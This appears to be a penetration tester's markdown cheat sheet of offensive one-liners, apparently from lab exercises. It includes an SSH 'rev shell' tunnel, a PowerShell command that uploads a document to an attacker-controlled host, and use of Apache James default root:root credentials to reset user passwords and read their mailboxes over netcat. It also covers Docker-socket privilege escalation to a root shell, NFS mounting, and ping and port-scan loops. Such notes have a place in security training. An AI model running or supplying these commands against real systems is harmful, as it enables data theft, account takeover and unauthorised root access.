# Random Bits ### stop output of errors in cmd COMMAND 2> /dev/null ## web servers ```bash # php php -S 0.0.0.0:8000 # ruby ruby -run -e httpd . -p 9000 # busybox busybox httpd -f -p 10000 ``` ## SSH ### Rev shell `ssh.exe -R 48172 -N` ### Output to null `Ssh -o "UserKnownHostsFile=/dev/null" -N -o "StrictHostKeyChecking no" -i "c:/Software/key"` `ssh -oKexAlgorithms=XXX -oHostKeyAlgorithms=XXX` ## File upload ### Apache On kali – put inside /var/www/html/, create a uploads folder and chown it to www-data, then start apache: ```php ``` On windows : ```powershell powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx') ``` ## Apache James Change password to users using root:root against port 4555, then check mailboxes for info. Can use the following: ```bash Listusers Setpassword mailadmin 1234 for user in mailadmin marcus jenny joe45 ryuu john; do (echo USER $user; sleep 1s; echo PASS 1234; sleep 1s; echo LIST; sleep 1s; echo QUIT)| nc -nvC 10.11.1.72 110; done ``` ## Pop3 ``` USER username PASS password LIST RETR 1 ``` ## NFS #### Enumerations: Showmout -e 10.11.1.72 #### Mount: Mount -t nfs -o vers=2 -o nolock 10.11.1.72:/home /nfs \*\* if unreadable file – change owndership to the value of the file 😉 \*\*\* ## Docker #### useful commands: ```docker docker ps #show installed dockers docker container exec -it CONTAINER_ID /bin/bash #interactive shell on docker docker images #show all installed dockers ``` #### socket write privesc: ``` docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` ## one line scanners #### Ping: Windows: ```powershell for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up. ``` Linux: ```bash for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done ``` #### Netcat TCP: nc -nvv -w 1 -z 10.11.1.220 3388-3390 UDP: nc -nv -u -z -w 1 10.11.1.115 160-162